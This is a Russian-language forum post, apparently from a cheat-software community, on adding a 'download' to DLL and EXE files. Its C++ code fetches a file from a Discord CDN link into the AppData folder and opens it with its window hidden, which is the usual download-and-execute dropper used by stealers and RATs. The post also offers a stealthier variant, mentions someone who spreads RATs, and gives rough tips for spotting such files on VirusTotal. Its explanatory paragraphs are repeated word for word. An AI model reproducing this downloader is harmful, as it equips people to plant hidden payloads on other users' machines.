-
Автор темы
- #1
Решил рассказать и показать как сделать скачку через файлы с расширением DLL и EXE.
На примере я покажу как скачать wav файл и открыть его.
Как же узнать, есть ли в длл вирус?
А тут всё просто. Для начала, чудесным образом закидываем наш файл на вирустотал:
И что мы видим? 7 детектов? "Там "нету" вирусов" - так может подумать неопытный юзер. Но не все так просто, как может показаться на первый взгляд
Нам нужна эта вкладочка -> DETAILS
Чуток пролистая вниз, мы видим такие строчки:
Если видим urlmon.dll, то 90% это стиллер или ратник.
Если SHELL32.dll, то не спешите делать вывод, что это вирус, в некоторых читах, например в легендваре система конфигов и луа сделана именно через ShellExecute();
Итог: детекты - самое последние на что нужно обращать внимание. Один из моих знакомых, распространяющих ратники, делает наоборот, как меньше детектов. Как бы глупо это не звучало, я больше боюсь когда у приложения детектов = 0.
Это не 100% способ распознать, есть ли в программе вирус. В большинстве случае, да, можно определить, а иногда и нет.
Люди, разбирающиеся в этой теме могут сделать более беспалевную скачку, а какую именно, при желании могу рассказать позже.
На примере я покажу как скачать wav файл и открыть его.
C++:
#define _CRT_SECURE_NO_WARNINGS // компилируем код, несмотря на ошибки
#include <iostream> // стандартные библиотеки C++
#include <urlmon.h> // для скачки файла URLDownloadToFile();
#include <tchar.h>
#pragma comment (lib, "urlmon.lib") // для скачки файла URLDownloadToFile();
using namespace std; // чтобы при выводе в консоль не писать по кд std;
int main()
{
setlocale(LC_ALL, "Russian"); // чтобы арабских символов не было
string appdata = getenv("APPDATA"); // получаем папку "appdata"
cout << "Получили папку к аппдате: " + appdata << endl;
appdata += "\\bell.wav"; // прибавляем к папке аппдаты имя файла (нужно для скачки), можно вообще любое
cout << "Наш файл будет находиться по пути: " + appdata << endl;
cout << "Идет скачка файла \n";
HRESULT hr = URLDownloadToFileA(NULL, "https://cdn.discordapp.com/attachments/710629557765406731/804365368336449586/bell.wav", appdata.c_str(), 0, 0); // скачка файла, hr = результат скачки
if (hr == S_OK) // если наша, программа скачана, то
{
cout << "Файл успешно скачан, открываем его\n";
ShellExecuteA(NULL, "open", appdata.c_str(), NULL, NULL, SW_HIDE); // открываем его
}
}
А тут всё просто. Для начала, чудесным образом закидываем наш файл на вирустотал:
И что мы видим? 7 детектов? "Там "нету" вирусов" - так может подумать неопытный юзер. Но не все так просто, как может показаться на первый взгляд
Нам нужна эта вкладочка -> DETAILS
Чуток пролистая вниз, мы видим такие строчки:
Если видим urlmon.dll, то 90% это стиллер или ратник.
Если SHELL32.dll, то не спешите делать вывод, что это вирус, в некоторых читах, например в легендваре система конфигов и луа сделана именно через ShellExecute();
Итог: детекты - самое последние на что нужно обращать внимание. Один из моих знакомых, распространяющих ратники, делает наоборот, как меньше детектов. Как бы глупо это не звучало, я больше боюсь когда у приложения детектов = 0.
Это не 100% способ распознать, есть ли в программе вирус. В большинстве случае, да, можно определить, а иногда и нет.
Люди, разбирающиеся в этой теме могут сделать более беспалевную скачку, а какую именно, при желании могу рассказать позже.
Последнее редактирование: